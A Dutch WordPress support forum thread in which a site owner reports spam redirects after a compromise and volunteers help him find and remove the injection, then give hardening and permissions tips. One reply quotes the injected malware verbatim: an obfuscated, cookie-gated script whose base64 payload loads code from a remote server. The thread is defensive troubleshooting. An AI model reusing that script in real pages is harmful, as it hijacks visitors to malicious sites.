• Opgelost wprobbie

    (@wprobbie)


    hi
    sinds kort een vreemd probleem: na inloggen als admin krijg ik een gewoon admin scherm
    na klikken op de home pagina krijg ik een zogenaamde botcheck en ververst de pagina naar een bladzijde met https://click.newpush.support/ljexwvfocb# of supervid.pro en daarna newsfresh.pro met allerlei “dames”

    na wegklikken en terugknop browser komen deze pagina’s niet meer terug

    kennelijk zit er iets vreemds in de site

    wat te doen?

    dank alvast
    Rob

    • Dit onderwerp is gewijzigd 5 jaren, 5 maanden geleden door wprobbie.
    • Dit onderwerp is gewijzigd 5 jaren, 5 maanden geleden door wprobbie.

    De pagina waar ik hulp bij nodig heb: [log in om de link te zien]

8 reacties aan het bekijken - 1 tot 8 (van in totaal 8)
  • Je hebt malware op je site 🙁

    Ik heb de broncode opgehaald via een tool en zie de volgende iframe op jou pagina(s):

    <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

    Als ik de base64 string decodeer, en dan the url-encoded karakters weer decodeer, dan zie ik de URL die naar die botcheck site gaat.

    Aan jou is nu de taak om te vinden welk bestand/plugin deze code in de pagina’s injecteert.

    Ik zou beginnen met de volgende punten:

    – Kijk in /wp-content/themes/JOUWTHEMA/functions.php
    – Kijk in /wp-content/plugins/ of er een plugin tussen zit die je niet kent
    – Kijk in /wp-content/uploads of hier nog rare php bestanden tussen zitten

    Hiervoor kun je ftp, ssh of een filemanager gebruiken (indien die beschikbaar is bij je webhost).

    Thread starter wprobbie

    (@wprobbie)

    dank je
    ga op zoek
    zit niet in functions of plugins
    ga www downloaden en zoeken op string die jij noemt toch?
    dank
    Rob

    Thread starter wprobbie

    (@wprobbie)

    gelukt, hartelijk dank johnny!
    heb in de database gezocht naar de string en die aangepast

    nog een vraagje als het mag:
    hoe kwam die malware op de wordpress site? hoe kan ik dat voorkomen?

    Waarschijnlijk via een kwetsbaarheid in een van je thema/plugin bestanden.

    Weet je ongeveer sinds wanneer dit is gebeurd ? Dan kun je misschien in je webserver access.logs kijken of je daar iets raars ziet. Zoals het opvragen van een URL die SQL queries bevat. Zoek in je logs bijvoorbeeld naar ‘INSERT INTO’, ‘FROM’, ‘WHERE ID’, etc.

    Heb je pagina’s waar mensen bestanden kunnen uploaden ? Dat zou ook zoiets mogelijk kunnen maken.

    Thread starter wprobbie

    (@wprobbie)

    gezocht in de logs maar niks gevonden;
    ik ben de enige die uploadt…plugins zijn uptodate
    dank, ik wacht maar even af of er nog iets komt

    • Deze reactie is gewijzigd 5 jaren, 5 maanden geleden door wprobbie.

    Software is nooit echt waterdicht/bugvrij. Hackers doen er eigenlijk alles aan om een zwakke plek te vinden en deze te misbruiken en kwaadaardige/malware-achtige code te injecteren zgn SQL injection.

    * Om je website extra te beveiligen kan je WordFence plugin gebruiken. Heeft wel handige features, in gratis versie.
    * Installeer niet te oude plugins en ook niet teveel op je website.
    * Update naar de nieuwe versie van plugins en WordPress core en het thema (maak een complete back-up)
    * Pas je schrijfrechten aan op de FTP server (om je op weg te helpen):

    BESTANDSNAAM
    htaccess | Plaats: ../.htaccess | Aanbevolen rechten: 644
    wp-config.php | Plaats: ../wp-config.php | Aanbevolen rechten: 644
    index.php | Plaats: ../index.php | Aanbevolen rechten: 644
    wp-blog-header.php | Plaats: ../wp-blog-header.php | Aanbevolen rechten: 644

    MAPNAAM
    root of public_html of httpdocs | plaats: ../ | Rechten: 755
    wp-admin | plaats: ../wp-admin/ | Rechten: 755
    wp-includes | plaats: ../wp-includes/ | Rechten: 755
    wp-content | plaats: ../wp-content/ | Rechten: 755

    In principe komt het er dus op neer dat de genoemde bestanden de rechten 644 moeten hebben en de genoemde mappen de rechten 755.

    Heb je verder nog vragen? Dan vernemen we dit graag!

    Vriendelijke groet,
    Bas

    Thread starter wprobbie

    (@wprobbie)

    dank voor je uitgebreide tips

    alles is u p to date alleen de core wil niet naar 5.0.3; ik start de update wel vanuit dashboard , dan krijg ik een “500” pagina en dan blijkt ie niet geupdated

    geen id hoe dat komt, we hebben nu verzie 498

    De foutmelding 500 is een HTTP internal server error. Is een veelvoorkomende foutmelding bij WordPress websites.

    Je zult toch even het een en ander uitsluiten waardoor dit komt en dit op te lossen waardoor je deze foutmelding krijgt. Deze website heeft een handige artikel hierover geschreven die je stap-voor-stap kunt doorlopen.

    Vriendelijke groet,
    Bas

8 reacties aan het bekijken - 1 tot 8 (van in totaal 8)
  • Het onderwerp ‘Omleiding naar bot check newsfresh.pro?’ is gesloten voor nieuwe reacties.